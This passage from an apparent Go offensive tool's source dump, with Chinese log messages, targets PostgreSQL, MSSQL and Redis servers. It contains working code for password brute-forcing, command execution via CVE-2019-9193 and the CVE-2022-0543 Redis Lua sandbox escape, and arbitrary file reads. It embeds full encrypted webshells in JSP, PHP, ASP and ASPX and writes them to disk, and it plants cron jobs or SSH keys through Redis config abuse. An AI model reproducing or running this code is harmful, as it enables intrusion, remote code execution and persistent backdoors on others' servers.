37 | 	for i := 0; i < length; i++ {
38 | 		result = append(result, bytes[rand.Intn(len(bytes))])
39 | 	}
40 | 	return string(result)
41 | }
42 | 
43 | func Creatable(conn *sql.DB) (table string) {
44 | 	table = RandStr(6)
45 | 	Info(table)
46 | 	sqlstr1 := fmt.Sprintf("CREATE TABLE %s (data varchar(2000));", table)
47 | 	Info(sqlstr1)
48 | 	MssqlCMD(sqlstr1, conn)
49 | 
50 | 	return table
51 | }
52 | 
53 | func Insertresult(table string, conn *sql.DB) {
54 | 	time.Sleep(time.Duration(1) * time.Second)
55 | 
56 | 	Info("将结果写到表里面")
57 | 	sqlstr2 := fmt.Sprintf("BULK INSERT %s FROM 'c:\\test11.txt' WITH (ROWTERMINATOR ='\\n')", table)
58 | 	Info(sqlstr2)
59 | 	MssqlCMD(sqlstr2, conn)
60 | 	Info("查表取结果")
61 | 	sqlstr3 := fmt.Sprintf("select * from %s", table)
62 | 	Info(sqlstr3)
63 | 	Info("命令执行结果如下")
64 | 	MssqlCMD(sqlstr3, conn)
65 | 
66 | }
67 | 


--------------------------------------------------------------------------------
/pac/postgre_cmd.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"log"
 8 | 	"os"
 9 | 	"strings"
10 | 
11 | 	_ "github.com/lib/pq"
12 | )
13 | 
14 | func postgrecmd(sqlstr string, conn *sql.DB) ([]map[string]interface{}, error) {
15 | 	rows, err := conn.Query(sqlstr)
16 | 	if err != nil {
17 | 		Err(err)
18 | 		return nil, nil
19 | 	}
20 | 	defer rows.Close()
21 | 
22 | 	result := make([]map[string]interface{}, 0)
23 | 	for rows.Next() {
24 | 		columns, err := rows.Columns()
25 | 		if err != nil {
26 | 			log.Fatal(err)
27 | 		}
28 | 		values := make([]interface{}, len(columns))
29 | 		valuePtrs := make([]interface{}, len(columns))
30 | 		for i := range values {
31 | 			valuePtrs[i] = &values[i]
32 | 		}
33 | 		if err := rows.Scan(valuePtrs...); err != nil {
34 | 			log.Fatal(err)
35 | 		}
36 | 
37 | 		row := make(map[string]interface{})
38 | 		for i, column := range columns {
39 | 			row[column] = values[i]
40 | 		}
41 | 
42 | 		result = append(result, row)
43 | 	}
44 | 	if err := rows.Err(); err != nil {
45 | 		log.Fatal(err)
46 | 	}
47 | 	for i, _ := range result {
48 | 		for _, w := range result[i] {
49 | 			fmt.Println(fmt.Sprintf("%s", w))
50 | 		}
51 | 	}
52 | 	return result, err
53 | }
54 | 
55 | // 循环执行sql语句
56 | func loopPostgreCMD(conn *sql.DB) {
57 | 	Info("执行PostgreSQL命令")
58 | 	reader := bufio.NewReader(os.Stdin)
59 | 	for {
60 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
61 | 		cmd, _ := reader.ReadString('\n')
62 | 		cmd = strings.TrimRight(cmd, "\r\n")
63 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
64 | 			break
65 | 		}
66 | 		_, err := postgrecmd(cmd, conn)
67 | 
68 | 		if err != nil {
69 | 			Info("循环执行sql语句报错")
70 | 		}
71 | 
72 | 	}
73 | }
74 | 
75 | func postgreisdba(conn *sql.DB) {
76 | 	result, err := postgrecmd("SELECT current_setting('is_superuser');", conn)
77 | 	if err != nil {
78 | 		Err(err)
79 | 	}
80 | 	for i, _ := range result {
81 | 		for _, w := range result[i] {
82 | 			OnOrOFF := fmt.Sprintf("%s", w)
83 | 			if OnOrOFF == "on" {
84 | 				Info("当前用户为管理员权限")
85 | 			} else {
86 | 				Info("非管理员权限")
87 | 			}
88 | 		}
89 | 	}
90 | }
91 | 


--------------------------------------------------------------------------------
/pac/postgre_connect.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | 	"os"
 7 | 	"strings"
 8 | 
 9 | 	_ "github.com/lib/pq"
10 | )
11 | 
12 | const (
13 | 	dbname = "postgres"
14 | )
15 | 
16 | func postgre_connect(Rhost string, Rport string, Ruser string, PWD string) (conn *sql.DB, sign bool) {
17 | 	psqlInfo := fmt.Sprintf("host=%s port=%s user=%s "+"password=%s dbname=%s sslmode=disable", Rhost, Rport, Ruser, PWD, dbname)
18 | 
19 | 	conn, err := sql.Open("postgres", psqlInfo)
20 | 	if err != nil {
21 | 		Err(err)
22 | 		return nil, false
23 | 	}
24 | 
25 | 	err = conn.Ping()
26 | 	if err != nil {
27 | 		Err(err)
28 | 		return nil, false
29 | 	}
30 | 	sign = true
31 | 	Success("连接成功")
32 | 	return conn, sign
33 | }
34 | 
35 | func PostgreCrack(Rhost string, Rport string) {
36 | 	Info("开始爆破,请稍等.....")
37 | 	sign = false
38 | 	for _, user := range Userdict["postgresql"] {
39 | 		for _, pass := range Passwords {
40 | 			pass = strings.Replace(pass, "{user}", user, -1)
41 | 			_, sign := postgre_connect(Rhost, Rport, user, pass)
42 | 			if sign == true {
43 | 				Success(fmt.Sprintf("账号密码为：%s:%s", user, pass))
44 | 				os.Exit(0)
45 | 			} else {
46 | 				fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass))
47 | 			}
48 | 		}
49 | 	}
50 | }
51 | 


--------------------------------------------------------------------------------
/pac/postgre_cve_2019_9193.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"database/sql"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | )
10 | 
11 | func cve_2019_9193_cmd(cmd string, conn *sql.DB) {
12 | 	Info("删除用来保存命令输出但是可能存在的表")
13 | 	_, err := postgrecmd("DROP TABLE IF EXISTS cmd_exec;", conn)
14 | 	if err != nil {
15 | 		Err(err)
16 | 	}
17 | 
18 | 	Info("创建保存命令输出的表")
19 | 	_, err = postgrecmd("CREATE TABLE cmd_exec(cmd_output text);", conn)
20 | 	if err != nil {
21 | 		Err(err)
22 | 	}
23 | 
24 | 	Info("执行系统命令")
25 | 	// _, err = postgrecmd("COPY cmd_exec FROM PROGRAM 'id';", conn)
26 | 	_, err = postgrecmd(fmt.Sprintf("COPY cmd_exec FROM PROGRAM '%s';", cmd), conn)
27 | 	if err != nil {
28 | 		Err(err)
29 | 	}
30 | 
31 | 	Info("查看执行结果")
32 | 	_, err = postgrecmd("SELECT * FROM cmd_exec;", conn)
33 | 	if err != nil {
34 | 		Err(err)
35 | 	}
36 | }
37 | 
38 | func cve_2019_9193_console(conn *sql.DB) {
39 | 	Info("删除用来保存命令输出但是可能存在的表")
40 | 	_, err := postgrecmd("DROP TABLE IF EXISTS cmd_exec;", conn)
41 | 	if err != nil {
42 | 		Err(err)
43 | 	}
44 | 
45 | 	Info("创建保存命令输出的表")
46 | 	_, err = postgrecmd("CREATE TABLE cmd_exec(cmd_output text);", conn)
47 | 	if err != nil {
48 | 		Err(err)
49 | 	}
50 | 
51 | 	Info("执行系统命令")
52 | 	reader := bufio.NewReader(os.Stdin)
53 | 	for {
54 | 		//
55 | 		postsqlcmd := "COPY cmd_exec FROM PROGRAM '"
56 | 		var cmd string
57 | 		fmt.Printf("%s:%s> $ ", Rhost, Rport)
58 | 		cmd, _ = reader.ReadString('\n')
59 | 		cmd = strings.TrimRight(cmd, "\r\n")
60 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
61 | 			break
62 | 		}
63 | 		aa := fmt.Sprintf("%s%s';", postsqlcmd, cmd)
64 | 		postsqlcmd = strings.TrimRight(postsqlcmd, "\r\n")
65 | 		Info(aa)
66 | 		_, err = postgrecmd(aa, conn)
67 | 		if err != nil {
68 | 			Err(err)
69 | 		}
70 | 		Info("查看执行结果")
71 | 		_, err = postgrecmd("SELECT * FROM cmd_exec;", conn)
72 | 		if err != nil {
73 | 			Err(err)
74 | 		}
75 | 	}
76 | }
77 | 


--------------------------------------------------------------------------------
/pac/postgre_fileread.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"bufio"
  5 | 	"database/sql"
  6 | 	"fmt"
  7 | 	"os"
  8 | 	"strings"
  9 | )
 10 | 
 11 | func PostgreFileRead(conn *sql.DB, file string) {
 12 | 	table := RandStr(3)
 13 | 
 14 | 	// 创建表
 15 | 	Info("创建表")
 16 | 	_, err := postgrecmd(fmt.Sprintf("CREATE TABLE %s (t TEXT);", table), conn)
 17 | 	if err != nil {
 18 | 		Err(err)
 19 | 	}
 20 | 
 21 | 	// COPY内容
 22 | 	Info("Copy命令")
 23 | 	_, err = postgrecmd(fmt.Sprintf("COPY %s FROM '%s';", table, file), conn)
 24 | 	if err != nil {
 25 | 		Err(err)
 26 | 
 27 | 	}
 28 | 
 29 | 	// 读取内容
 30 | 	Info("读取内容")
 31 | 	_, err = postgrecmd(fmt.Sprintf("SELECT * FROM %s;", table), conn)
 32 | 	if err != nil {
 33 | 		Err(err)
 34 | 	}
 35 | 
 36 | }
 37 | 
 38 | // 循环读取文件
 39 | func loopPostgreFileRead(conn *sql.DB) {
 40 | 	Info("输入读取的文件名")
 41 | 	reader := bufio.NewReader(os.Stdin)
 42 | 	for {
 43 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
 44 | 		cmd, _ := reader.ReadString('\n')
 45 | 		cmd = strings.TrimRight(cmd, "\r\n")
 46 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 47 | 			break
 48 | 		}
 49 | 		PostgreFileRead(conn, cmd)
 50 | 	}
 51 | }
 52 | 
 53 | // 利用postgresql大对象来处理读文件
 54 | func PostgreFileReadhex(conn *sql.DB, file string) {
 55 | 
 56 | 	key := RandStrnum(3)
 57 | 	Info("请手工把hex转换成string")
 58 | 
 59 | 	// 创建表
 60 | 	Info("lo_import读取文件")
 61 | 	Info(fmt.Sprintf("select lo_import('%s',%s);", file, key))
 62 | 
 63 | 	_, err := postgrecmd(fmt.Sprintf("select lo_import('%s',%s);", file, key), conn)
 64 | 	if err != nil {
 65 | 		Err(err)
 66 | 	}
 67 | 
 68 | 	// 输出
 69 | 	Info("转换成hex输出")
 70 | 	Info(fmt.Sprintf("select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;"))
 71 | 	_, err = postgrecmd(fmt.Sprintf("select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=%s order by pageno)a;", key), conn)
 72 | 	if err != nil {
 73 | 		Err(err)
 74 | 	}
 75 | }
 76 | 
 77 | // 循环读取文件
 78 | func loopPostgreFileReadhex(conn *sql.DB) {
 79 | 	Info("输入读取的文件名")
 80 | 	reader := bufio.NewReader(os.Stdin)
 81 | 	for {
 82 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
 83 | 		cmd, _ := reader.ReadString('\n')
 84 | 		cmd = strings.TrimRight(cmd, "\r\n")
 85 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 86 | 			break
 87 | 		}
 88 | 		PostgreFileReadhex(conn, cmd)
 89 | 	}
 90 | }
 91 | 
 92 | // 循环列目录
 93 | func loopPostgreListDirectoy(conn *sql.DB) {
 94 | 	Info("输入目录")
 95 | 	reader := bufio.NewReader(os.Stdin)
 96 | 	for {
 97 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
 98 | 		cmd, _ := reader.ReadString('\n')
 99 | 		cmd = strings.TrimRight(cmd, "\r\n")
100 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
101 | 			break
102 | 		}
103 | 		postgrecmd(fmt.Sprintf("select pg_ls_dir('%s');", cmd), conn)
104 | 	}
105 | }
106 | 
107 | // 列目录
108 | func PostgreListDirectoy(conn *sql.DB, file string) {
109 | 	postgrecmd(fmt.Sprintf("select pg_ls_dir('%s');", file), conn)
110 | }
111 | 


--------------------------------------------------------------------------------
/pac/postgre_write.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 	"fmt"
 6 | )
 7 | 
 8 | func WriteFile(conn *sql.DB, uploadPath string, e string) {
 9 | 	table := RandStr(3)
10 | 
11 | 	Info("创建表")
12 | 	_, err := postgrecmd(fmt.Sprintf("CREATE TABLE %s (t TEXT);", table), conn)
13 | 	if err != nil {
14 | 		Err(err)
15 | 	}
16 | 
17 | 	if e == "jsp" {
18 | 		Webshell = "<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals(\"POST\")){String k=\"e45e329feb5d925b\";/*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/session.putValue(\"u\",k);Cipher c=Cipher.getInstance(\"AES\");c.init(2,new SecretKeySpec(k.getBytes(),\"AES\"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>"
19 | 	} else if e == "php" {
20 | 		Webshell = "<?php\n@error_reporting(0);\nsession_start();\n    $key=\"e45e329feb5d925b\"; //该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond\n\t$_SESSION['k']=$key;\n\tsession_write_close();\n\t$post=file_get_contents(\"php://input\");\n\tif(!extension_loaded('openssl'))\n\t{\n\t\t$t=\"base64_\".\"decode\";\n\t\t$post=$t($post.\"\");\n\t\t\n\t\tfor($i=0;$i<strlen($post);$i++) {\n    \t\t\t $post[$i] = $post[$i]^$key[$i+1&15]; \n    \t\t\t}\n\t}\n\telse\n\t{\n\t\t$post=openssl_decrypt($post, \"AES128\", $key);\n\t}\n    $arr=explode('|',$post);\n    $func=$arr[0];\n    $params=$arr[1];\n\tclass C{public function __invoke($p) {eval($p.\"\");}}\n    @call_user_func(new C(),$params);\n?>\n"
21 | 	} else if e == "asp" {
22 | 		Webshell = "<%\nResponse.CharSet = \"UTF-8\" \nk=\"e45e329feb5d925b\" '该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond\nSession(\"k\")=k\nsize=Request.TotalBytes\ncontent=Request.BinaryRead(size)\nFor i=1 To size\nresult=result&Chr(ascb(midb(content,i,1)) Xor Asc(Mid(k,(i and 15)+1,1)))\nNext\nexecute(result)\n%>"
23 | 	} else if e == "aspx" {
24 | 		Webshell = "<%@ Page Language=\"C#\" %><%@Import Namespace=\"System.Reflection\"%><%Session.Add(\"k\",\"e45e329feb5d925b\"); /*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/byte[] k = Encoding.Default.GetBytes(Session[0] + \"\"),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance(\"U\").Equals(this);%>\n"
25 | 	}
26 | 
27 | 	Info("往表中插入Webshell")
28 | 	_, err = postgrecmd(fmt.Sprintf("INSERT INTO %s(t) VALUES ('%s');", table, Webshell), conn)
29 | 	if err != nil {
30 | 		Err(err)
31 | 	}
32 | 
33 | 	Info("将webshell导出,冰蝎默认的webshell")
34 | 	_, err = postgrecmd(fmt.Sprintf("COPY %s(t) TO '%s';", table, uploadPath), conn)
35 | 	if err != nil {
36 | 		Err(err)
37 | 	}
38 | 
39 | }
40 | 


--------------------------------------------------------------------------------
/pac/redis_cmd.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"bufio"
  5 | 	"context"
  6 | 	"fmt"
  7 | 	"os"
  8 | 	"strings"
  9 | )
 10 | 
 11 | // RedisCmd 执行 Redis 命令
 12 | func RedisCmd(cmd string) interface{} {
 13 | 
 14 | 	ctx := context.Background()
 15 | 
 16 | 	var argsInterface []interface{}
 17 | 
 18 | 	// 处理输入字符串有空格的问题
 19 | 	if strings.Contains(cmd, "\"") {
 20 | 		oldString := ReString(cmd, "\"(.*?)\"")
 21 | 		newString := strings.ReplaceAll(oldString, " ", "$")
 22 | 		cmd = strings.ReplaceAll(cmd, oldString, newString)
 23 | 		cmd = strings.ReplaceAll(cmd, "\"", "")
 24 | 	}
 25 | 
 26 | 	args := strings.Fields(cmd)
 27 | 	for _, arg := range args {
 28 | 		if strings.Contains(arg, "$") {
 29 | 			arg = strings.ReplaceAll(arg, "$", " ")
 30 | 		}
 31 | 		argsInterface = append(argsInterface, arg)
 32 | 	}
 33 | 
 34 | 	info, err := Rdb.Do(ctx, argsInterface...).Result()
 35 | 	if err != nil {
 36 | 		Err(err)
 37 | 		return ""
 38 | 	}
 39 | 	return info
 40 | }
 41 | 
 42 | // 获取 Redis 基本信息
 43 | func redisVersion() bool {
 44 | 	info := RedisCmd("info")
 45 | 	if strings.Contains(info.(string), "redis_version") {
 46 | 		Info("获取 Redis 基本信息")
 47 | 		os := ReString(info, "os:.*")
 48 | 		version := ReString(info, "redis_version:.*")
 49 | 		Success(os)
 50 | 		Success(version)
 51 | 		dir := RedisCmd("config get dir")
 52 | 		redisDir = redisString(dir)[4:]
 53 | 		Success(redisDir)
 54 | 
 55 | 		file := RedisCmd("config get dbfilename")
 56 | 		redisDbFilename = redisString(file)[11:]
 57 | 		Success(redisDbFilename)
 58 | 		return true
 59 | 	}
 60 | 	return false
 61 | }
 62 | 
 63 | // 循环执行shell命令
 64 | func loopCmd(s string) {
 65 | 	Info("执行命令")
 66 | 	reader := bufio.NewReader(os.Stdin)
 67 | 	for {
 68 | 		fmt.Print("$ ")
 69 | 		cmd, _ := reader.ReadString('\n')
 70 | 		cmd = strings.TrimRight(cmd, "\r\n")
 71 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 72 | 			if strings.Contains(s, "exec") {
 73 | 				CloseSlave("exec")
 74 | 			}
 75 | 			break
 76 | 		}
 77 | 		// 执行命令
 78 | 		if strings.Contains(s, "exec") {
 79 | 			RunCmd(cmd)
 80 | 		} else if strings.Contains(s, "lua") {
 81 | 			RedisLua(cmd)
 82 | 		}
 83 | 
 84 | 	}
 85 | }
 86 | 
 87 | // 循环执行 Redis 命令
 88 | func loopRedis() {
 89 | 	Info("执行 Redis 命令")
 90 | 	reader := bufio.NewReader(os.Stdin)
 91 | 	for {
 92 | 		fmt.Printf("%s:%s> ", Rhost, Rport)
 93 | 		cmd, _ := reader.ReadString('\n')
 94 | 		cmd = strings.TrimRight(cmd, "\r\n")
 95 | 		if cmd == "exit" || cmd == "q" || cmd == "quit" {
 96 | 			break
 97 | 		}
 98 | 		// 执行命令
 99 | 		fmt.Println(RedisCmd(cmd))
100 | 	}
101 | }
102 | 


--------------------------------------------------------------------------------
/pac/redis_connect.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"fmt"
 6 | 	"github.com/go-redis/redis/v8"
 7 | 	"os"
 8 | 	"strings"
 9 | 	"sync"
10 | 	"time"
11 | )
12 | 
13 | var (
14 | 	Rdb             *redis.Client
15 | 	redisDir        string
16 | 	redisDbFilename string
17 | )
18 | 
19 | // RedisClient 连接 Redis
20 | func RedisClient(pwd string) (err error) {
21 | 
22 | 	Rdb = redis.NewClient(&redis.Options{
23 | 		Addr:     fmt.Sprintf("%s:%s", Rhost, Rport),
24 | 		Password: pwd, // 密码认证
25 | 	})
26 | 
27 | 	ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
28 | 
29 | 	defer cancel()
30 | 
31 | 	pong, err := Rdb.Ping(ctx).Result()
32 | 	if err != nil {
33 | 		return err
34 | 	}
35 | 	if strings.Contains(pong, "PONG") {
36 | 		redisVersion()
37 | 	}
38 | 	return nil
39 | }
40 | 
41 | var wg sync.WaitGroup
42 | 
43 | // 爆破密码
44 | func ReddisCrack() {
45 | 	ch := make(chan struct{}, 1)
46 | 	for _, value := range Passwords {
47 | 		wg.Add(1)
48 | 		ch <- struct{}{}
49 | 		go func() {
50 | 			defer wg.Done()
51 | 			err := RedisClient(value)
52 | 			if err == nil {
53 | 				Success("成功爆破到 Redis 密码：" + value)
54 | 				os.Exit(0)
55 | 			} else if strings.Contains(err.Error(), "ERR Client sent AUTH, but no password is set") {
56 | 				Success("存在未授权 Redis , 不需要输入密码")
57 | 				os.Exit(0)
58 | 			} else {
59 | 				Err(err)
60 | 			}
61 | 			<-ch
62 | 		}()
63 | 	}
64 | 	wg.Wait()
65 | 	Info("未发现 Redis 密码")
66 | }
67 | 


--------------------------------------------------------------------------------
/pac/redis_export.go:
--------------------------------------------------------------------------------
  1 | package pac
  2 | 
  3 | import (
  4 | 	"context"
  5 | 	"encoding/json"
  6 | 	"github.com/go-redis/redis/v8"
  7 | 	"io/ioutil"
  8 | )
  9 | 
 10 | var (
 11 | 	ctx      = context.Background()
 12 | 	FileName = "out.json"
 13 | )
 14 | 
 15 | type String struct {
 16 | 	Key string `json:"key"`
 17 | 	Val string `json:"val"`
 18 | }
 19 | type HashData struct {
 20 | 	Field string `json:"field"`
 21 | 	Val   string `json:"val"`
 22 | }
 23 | type Hash struct {
 24 | 	Key  string     `json:"key"`
 25 | 	Data []HashData `json:"data"`
 26 | }
 27 | type ZsetData struct {
 28 | 	Member string  `json:"member"`
 29 | 	Score  float64 `json:"score"`
 30 | }
 31 | type Zset struct {
 32 | 	Key  string     `json:"key"`
 33 | 	Data []ZsetData `json:"data"`
 34 | }
 35 | type Set struct {
 36 | 	Key  string   `json:"key"`
 37 | 	Data []string `json:"data"`
 38 | }
 39 | type List struct {
 40 | 	Key  string `json:"key"`
 41 | 	Data string `json:"data"`
 42 | }
 43 | 
 44 | type RedisInfo struct {
 45 | 	String []String `json:"string"`
 46 | 	Hash   []Hash   `json:"hash"`
 47 | 	Set    []Set    `json:"set"`
 48 | 	List   []List   `json:"list"`
 49 | 	Zset   []Zset   `json:"zset"`
 50 | }
 51 | 
 52 | // Redis 导出
 53 | func handle_export() {
 54 | 	redisInfo := RedisInfo{}
 55 | 	var cursor uint64
 56 | 	keys, cursor, err := Rdb.Scan(ctx, cursor, "*", 100).Result()
 57 | 	if err != nil {
 58 | 		Err(err)
 59 | 		return
 60 | 	}
 61 | 
 62 | 	for _, key := range keys {
 63 | 		sType, err := Rdb.Type(ctx, key).Result()
 64 | 		if err != nil {
 65 | 			Err(err)
 66 | 			return
 67 | 		}
 68 | 
 69 | 		switch sType {
 70 | 		case "string":
 71 | 			val, _ := Rdb.Get(ctx, key).Result()
 72 | 			strInfo := String{
 73 | 				Key: key,
 74 | 				Val: val,
 75 | 			}
 76 | 			redisInfo.String = append(redisInfo.String, strInfo)
 77 | 
 78 | 		case "list":
 79 | 			val, _ := Rdb.LPop(ctx, key).Result()
 80 | 			listInfo := List{
 81 | 				Key:  key,
 82 | 				Data: val,
 83 | 			}
 84 | 
 85 | 			redisInfo.List = append(redisInfo.List, listInfo)
 86 | 
 87 | 		case "hash":
 88 | 			val, _ := Rdb.HGetAll(ctx, key).Result()
 89 | 			hashInfo := Hash{
 90 | 				Key: key,
 91 | 			}
 92 | 
 93 | 			for k, v := range val {
 94 | 				data := HashData{
 95 | 					Field: k,
 96 | 					Val:   v,
 97 | 				}
 98 | 				hashInfo.Data = append(hashInfo.Data, data)
 99 | 			}
100 | 			redisInfo.Hash = append(redisInfo.Hash, hashInfo)
101 | 
102 | 		case "set":
103 | 			val, _ := Rdb.SMembers(ctx, key).Result()
104 | 			setInfo := Set{
105 | 				Key:  key,
106 | 				Data: val,
107 | 			}
108 | 			redisInfo.Set = append(redisInfo.Set, setInfo)
109 | 
110 | 		case "zset":
111 | 
112 | 			val, _ := Rdb.ZRevRangeWithScores(ctx, key, 0, -1).Result()
113 | 			zsetInfo := Zset{
114 | 				Key: key,
115 | 			}
116 | 			zs := []ZsetData{}
117 | 
118 | 			for _, z := range val {
119 | 				zs = append(zs, ZsetData{
120 | 					Member: z.Member.(string),
121 | 					Score:  z.Score,
122 | 				})
123 | 
124 | 			}
125 | 			zsetInfo.Data = zs
126 | 			redisInfo.Zset = append(redisInfo.Zset, zsetInfo)
127 | 		}
128 | 
129 | 	}
130 | 	bs, err := json.Marshal(redisInfo)
131 | 	if err != nil {
132 | 		Info("序列化成json失败" + err.Error())
133 | 	}
134 | 	err = ioutil.WriteFile(FileName, bs, 0644)
135 | 	if err != nil {
136 | 		Info("保存到文件失败" + err.Error())
137 | 	}
138 | 
139 | 	Success(FileName + "  导出成功")
140 | }
141 | 
142 | // Redis 导入
143 | func handle_import() {
144 | 
145 | 	bs, err := ioutil.ReadFile(FileName)
146 | 	if err != nil {
147 | 		Info("读取文件失败" + err.Error())
148 | 	}
149 | 	redis_info := RedisInfo{}
150 | 	err = json.Unmarshal(bs, &redis_info)
151 | 	if err != nil {
152 | 		Info("不是合法的json文件" + err.Error())
153 | 	}
154 | 	//string
155 | 	for _, v := range redis_info.String {
156 | 		Rdb.Set(ctx, v.Key, v.Val, 0)
157 | 	}
158 | 	//hash
159 | 	for _, v := range redis_info.Hash {
160 | 		maps := map[string]string{}
161 | 		for _, d := range v.Data {
162 | 			maps[d.Field] = d.Val
163 | 		}
164 | 		Rdb.HMSet(ctx, v.Key, maps)
165 | 	}
166 | 	//set
167 | 	for _, v := range redis_info.Set {
168 | 
169 | 		for _, v1 := range v.Data {
170 | 			Rdb.SAdd(ctx, v.Key, v1)
171 | 		}
172 | 	}
173 | 	//zset
174 | 
175 | 	for _, v := range redis_info.Zset {
176 | 
177 | 		zs := []*redis.Z{}
178 | 		for _, v1 := range v.Data {
179 | 			zs = append(zs, &redis.Z{
180 | 				Member: v1.Member,
181 | 				Score:  v1.Score,
182 | 			})
183 | 		}
184 | 
185 | 		Rdb.ZAdd(ctx, v.Key, zs...)
186 | 	}
187 | 	//list
188 | 	for _, v := range redis_info.List {
189 | 		for _, v1 := range v.Data {
190 | 			Rdb.RPush(ctx, v.Key, v1)
191 | 		}
192 | 	}
193 | 
194 | 	Success(FileName + "  导入成功")
195 | 
196 | }
197 | 


--------------------------------------------------------------------------------
/pac/redis_getshell.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"bufio"
 5 | 	"context"
 6 | 	"fmt"
 7 | 	"os"
 8 | 	"strings"
 9 | 	"time"
10 | )
11 | 
12 | func echo(flag, path string) {
13 | 	var dir, dbfilename, webshell string
14 | 	var save, helloWebShell = "save", "helloWebShell"
15 | 
16 | 	reader := bufio.NewReader(os.Stdin)
17 | 
18 | 	switch flag {
19 | 	case "getshell":
20 | 		fmt.Print("设置保存的路径: ")
21 | 		dir, _ = reader.ReadString('\n')
22 | 		dir = strings.TrimSpace(dir)
23 | 		dir = fmt.Sprintf("config set dir %s", dir)
24 | 
25 | 		fmt.Print("设置保存的文件名：")
26 | 		fmt.Scanln(&dbfilename)
27 | 		dbfilename = fmt.Sprintf("config set dbfilename %s", dbfilename)
28 | 
29 | 		Info("读取 " + path)
30 | 		webshell = fmt.Sprintf("\n\n\n%s\n\n", readExp(path))
31 | 
32 | 	case "crontab":
33 | 		dir = "config set dir /var/spool/cron/"
34 | 		dbfilename = "config set dbfilename root"
35 | 		Info("读取 " + path)
36 | 		webshell = fmt.Sprintf("\n\n\n%s\n\n", readExp(path))
37 | 
38 | 	case "ssh":
39 | 		fmt.Print("设置Linux用户名: ")
40 | 		// reader := bufio.NewReader(os.Stdin)
41 | 		dir, _ = reader.ReadString('\n')
42 | 		dir = strings.TrimSpace(dir)
43 | 
44 | 		if strings.EqualFold(dir, "root") {
45 | 			dir = fmt.Sprintf("config set dir /%s/.ssh/", dir)
46 | 		} else if strings.Contains(dir, "/") {
47 | 			dir = fmt.Sprintf("config set dir %s", dir)
48 | 		} else {
49 | 			dir = fmt.Sprintf("config set dir /home/%s/.ssh/", dir)
50 | 		}
51 | 
52 | 		dbfilename = "config set dbfilename authorized_keys"
53 | 		Info("读取 " + path)
54 | 		webshell = fmt.Sprintf("\n\n%s\n\n", readExp(path))
55 | 	}
56 | 
57 | 	Info(dir)
58 | 	Success(RedisCmd(dir))
59 | 
60 | 	Info(dbfilename)
61 | 	Success(RedisCmd(dbfilename))
62 | 
63 | 	Info(webshell)
64 | 	ctx := context.Background()
65 | 	err := Rdb.Set(ctx, helloWebShell, webshell, time.Minute*2).Err()
66 | 	if err != nil {
67 | 		Err(err)
68 | 	}
69 | 
70 | 	Info(save)
71 | 	Success(RedisCmd(save))
72 | 
73 | 	Info("del " + helloWebShell)
74 | 	Success(RedisCmd("del " + helloWebShell))
75 | 
76 | 	dir2 := fmt.Sprintf("config set dir %v", redisDir)
77 | 	Info(dir2)
78 | 	Success(RedisCmd(dir2))
79 | 
80 | 	db := fmt.Sprintf("config set dbfilename %v", redisDbFilename)
81 | 	Info(db)
82 | 	Success(RedisCmd(db))
83 | 
84 | 	Info(save)
85 | 	Success(RedisCmd(save))
86 | 
87 | }
88 | 


--------------------------------------------------------------------------------
/pac/redis_lua.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"fmt"
 6 | 	"github.com/axgle/mahonia"
 7 | )
 8 | 
 9 | // RedisLua Lua沙盒绕过命令执行 CVE-2022-0543
10 | func RedisLua(cmd string) {
11 | 	ctx := context.Background()
12 | 
13 | 	val, err := Rdb.Do(ctx, "eval", fmt.Sprintf(`local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("%v", "r"); local res = f:read("*a"); f:close(); return res`, cmd), "0").Result()
14 | 	if err != nil {
15 | 		Err(err)
16 | 		return
17 | 	}
18 | 	fmt.Println(mahonia.NewDecoder("gbk").ConvertString(val.(string)))
19 | }
20 | 


--------------------------------------------------------------------------------
/pac/redis_slave.go:
--------------------------------------------------------------------------------
 1 | package pac
 2 | 
 3 | import (
 4 | 	"context"
 5 | 	"fmt"
